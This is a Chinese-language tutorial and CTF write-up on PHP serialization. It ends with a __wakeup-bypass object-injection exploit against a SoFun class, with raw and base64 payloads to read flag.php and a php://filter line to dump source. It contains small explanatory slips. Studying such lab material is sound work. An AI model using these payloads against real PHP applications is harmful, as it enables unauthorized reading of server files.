介绍
serialize() ---> 函数用于序列化对象或数组,并返回一个字符串。如下:
<?php
$sites = array('t1', 'tt2', 'ttt3');
$serialized_data = serialize($sites);
echo $serialized_data;
?>
输出结果
a:3:{i:0;s:2:"t1";i:1;s:3:"tt2";i:2;s:4:"ttt3";}
各个字符的意义 ---> o表示对象,a表示数组,s表示字符,i表示数字
a:3 表示有三个数组
i:0,表示第一个数组,s:2:"t1",表示第一个数组是字符,2表示有两个字符,为"t1"
i:1,表示第二个数组,s:3:"tt2",表示第二个数组是字符,3表示有三个字符,为"tt2"
i:2,表示第三个数组,s:4:"ttt3",表示第三个数组是字符,4表示有三个字符,为"ttt3"
unserialize() ---> 函数用于将通过 serialize()函数序列化后的对象或数组进行反序列化,并返回原始的对象结构,如:
<?php
$sites = array('t1', 'tt2', 'ttt3');
$serialized_data = serialize($sites);
#echo $serialized_data;
$unserialized_data = unserialize($serialized_data);
print_r($unserialized_data);
?>
结果如下:
Array
(
[0] => t1
[1] => tt2
[2] => ttt3
)
php使用serialize这个过程被称为序列化,使用unserialize这个过程被称为反序列化。
利用
php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用,比如__construct当一个对象创建时被调用,__destruct当一个对象销毁时被调用,__toString当一个对象被当作一个字符串使用。
例如
<?php
class Test
{
public $handle1;
private $handle2;
protected $handle3;
public function __construct($handle1,$handle2,$handle3)
{
$this->handle1 = $handle1;
$this->handle2 = $handle2;
$this->handle3 = $handle3;
echo '__construct<br />';
}
public function __destruct()
{
echo $this->handle1.'<br />';
echo '__destruct<br />';
}
public function __wakeup()
{
echo '__wakeup<br />';
}
}
$obj = new Test("111","222","333");
$see = serialize($obj);
print 'Serialized: ' . $see . '<br />';
# %00Test%00v2 表示 private %00*%00v3 表示protected
$ss = 'O:4:"Test":3:{s:7:"handle1";s:3:"777";s:17:"%00Test%00handle2";s:3:"888";S:14:"%00*%00handle3";s:3:"999";}';
$obj2 = unserialize($ss);
var_dump($obj2);
?>
结果如下:
图片.png
这里[php 5.6.28]的payload='O:4:"Test":3:{s:7:"handle1";s:3:"777";s:17:"%00Test%00handle2";s:3:"888";s:14:"%00*%00handle3";s:3:"999";}'
其他有平台有些可以跑paylaod='O:4:"Test":3:{s:7:"handle1";s:3:"777";s:13:"%00Test%00handle2";s:3:"888";s:10:"%00*%00handle3";s:3:"999";}'[不过我没有成功]
ctf题目
<?php
class SoFun{
protected $file='index.php';
function __destruct(){
if(!empty($this->file))
{
//查找file文件中的字符串,如果有'\\'和'/'在字符串中,就显示错误
if(strchr($this->file,"\\")===false && strchr($this->file, '/')===false)
{
show_source(dirname (__FILE__).'/'.$this ->file);
}
else{
die('Wrong filename.');
}
}
}
function __wakeup()
{
$this-> file='index.php';
}
public function __toString()
{
return '';
}
}
if (!isset($_GET['file']))
{
show_source('index.php');
}
else{
$file=base64_decode( $_GET['file']);
echo unserialize($file );
}
?> #<!--flag in flag.php-->
1、代码审计
审计代码,可以发现要得到flag ,思路如下:
1、源码最后提示,flag 在flag.php里面;
2、注意到__destruct魔术方法中,有这么一段代码,将file文件内容显示出来
show_source(dirname(FILE).’/‘.$this->file),这个是解题关键;
3、若POST“file”参数为序列化对象,且将file设为flag.php;那么可以通过unserialize反序列化,进而调用__destruct魔术方法来显示flag.php源码(要注意的是file参数内容需要经过base64编码);
4、上面的分析是多么美好,但从代码分析可以知道,还有__wakeup这个拦路虎,通过unserialize反序列化之后,也会调用__wakeup方法,它会把file设为index.php;
5、总结下来就是,想办法把file设为flag.php,调用__destruct方法,且绕过__wakeup。
2、PHP反序列化对象注入漏洞
上网查资料,发现原来这个CTF题目是根据PHP反序列化对象注入漏洞改编的。
简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。举个栗子,比如有个Student类,里面有个参数为name。
实际情况:O:7:”Student”:1:{S:4:”name”;s:8:”zhangsan”;}
Payload:O:7:”Student”:2:{S:4:”name”;s:8:”zhangsan”;}
Payload对象属性个数为2,而实际属性个数为1,那么就会掉入漏洞,从而跳过wakeup()方法。
简单来说,当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。
3、Exp
php版本
$ php --version
PHP 7.0.0
这里$file是protected ,需要---> \00*\00file 表示protected。S用--->\00 只代表一个字符。用s--->\00表示3个字符。
payload = ?file=O:5:"SoFun":2:{s:11:"\00*\00file";s:8:"flag.php";}
或者
payload = ?file=O:5:"SoFun":2:{S:7:"\00*\00file";s:8:"flag.php";}
经过base64加密后
payload = ?file=Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==
php伪协议
?file=php://filter/read=convert.base64-encode/resource=index.php
网友评论